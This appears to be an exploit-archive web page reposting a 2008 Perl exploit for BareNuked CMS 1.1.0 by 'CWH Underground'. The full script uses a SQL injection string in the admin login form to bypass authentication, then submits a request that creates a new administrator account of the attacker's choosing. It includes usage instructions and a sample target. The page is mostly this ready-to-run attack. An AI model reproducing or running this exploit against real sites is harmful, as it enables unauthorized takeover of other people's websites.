首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
BareNuked CMS 1.1.0 Arbitrary Add Admin Exploit
来源:cwh.citec.us 作者:CWH 发布时间:2008-07-01  
#!/usr/bin/perl
#============================================
# BareNuked CMS Arbitrary Add Admin Exploit
#============================================
#
#  ,--^----------,--------,-----,-------^--,
#  | |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..
#  `+---------------------------^----------|
#    `\_,-------, _________________________|
#      / XXXXXX /`|     /
#     / XXXXXX /  `\   /
#    / XXXXXX /\______(
#   / XXXXXX /          
#  / XXXXXX /
# (________(            
#  `------'
#
#AUTHOR : CWH Underground
#DATE : 30 June 2008
#SITE : cwh.citec.us
#
#
#####################################################
#APPLICATION : BareNuked CMS
#VERSION     : 1.1.0
#DOWNLOAD    : http://downloads.sourceforge.net/barenuked/barenuked-1.1.0.zip
######################################################
#
#Note: magic_quotes_gpc = off
#
#This Exploit will Add user to Administrator's Privilege.
#
##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################
#
# milw0rm.com [2008-06-30]


use LWP;
use HTTP::Request;
use HTTP::Cookies;

if ($#ARGV + 1 != 4)
{
   print "\n==============================================\n";
   print "  BareNuked CMS Arbitrary Add Admin Exploit   \n";
   print "                                              \n";
   print "        Discovered By CWH Underground         \n";
   print "==============================================\n";
   print "                                              \n";
   print "  ,--^----------,--------,-----,-------^--,   \n";
   print "  | |||||||||   `--------'     |          O \n";
   print "  `+---------------------------^----------|   \n";
   print "    `\_,-------, _________________________|   \n";
   print "      / XXXXXX /`|     /                      \n";
   print "     / XXXXXX /  `\   /                       \n";
   print "    / XXXXXX /\______(                        \n";
   print "   / XXXXXX /                                 \n";
   print "  / XXXXXX /   .. CWH Underground Hacking Team ..  \n";
   print " (________(                                   \n";
   print "  `------'                                    \n";
   print "                                              \n";
   print "Usage: ./xpl-barenuked.pl <BareNuked-CMS URL> <user> <pass> <email>\n";
   print "Ex. ./xpl-barenuked.pl http://www.target.com/barenuked/ cwh password cwh\@cwh.com\n";
   exit();
}

$cmsurl = $ARGV[0];
$user = $ARGV[1];
$pass = $ARGV[2];
$mail = $ARGV[3];


$loginurl = $cmsurl."admin/index.php";
$adduserurl = $cmsurl."admin/users.php";
$post_content = "name=".$user."&pass=".$pass."&email=".$mail."&rights=admin&mode=create&Submit=New";

print "\n..::Login Page URL::..\n";
print "[+] $loginurl\n";
print "\n..::Add User Page URL::..\n";
print "[+] $adduserurl\n\n";

$ua = LWP::UserAgent->new;
$ua->cookie_jar(HTTP::Cookies->new);

$request = HTTP::Request->new (POST => $loginurl);
$request->header (Accept-Charset => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7');
$request->content_type ('application/x-www-form-urlencoded');
$request->content ('username=admin&password=\' or \'a\'=\'a&submit=Log+In');

$response = $ua->request($request);

$content = $response->content;

if ($content =~ /My Webpage Administration/)
{
   print "\n!!! Login Success !!!\n\n";
}
else
{
   print "\n!!! Login Failed !!!\n\n";
   exit();
}

$request = HTTP::Request->new (POST => $adduserurl);
$request->content_type ('application/x-www-form-urlencoded');
$request->content ($post_content);
$response = $ua->request($request);

$content = $response->content;

if ($content =~ /$user/)
{
   print "\n!!! Exploit Completed !!!\n";
}
else
{
   print "\n!!! Exploit Failed !!!\n";
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Joomla Component Xe webtv (id)
·Pivot 1.40.5 Dreamwind load_te
·XnView 1.93.6 for Windows .taa
·AShop Deluxe 4.x (catalogue.ph
·Seagull PHP Framework <= 0.6.4
·busybox uname format string ex
·PHPmotion <= 2.0 (update_profi
·his exploit abuses an old bug
·PHPmotion <= 2.0 (update_profi
·PHP-Nuke Platinium <= 7.6.b.5
·Joomla Component QuickTime VR
·Mambo Component Articles (arti
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved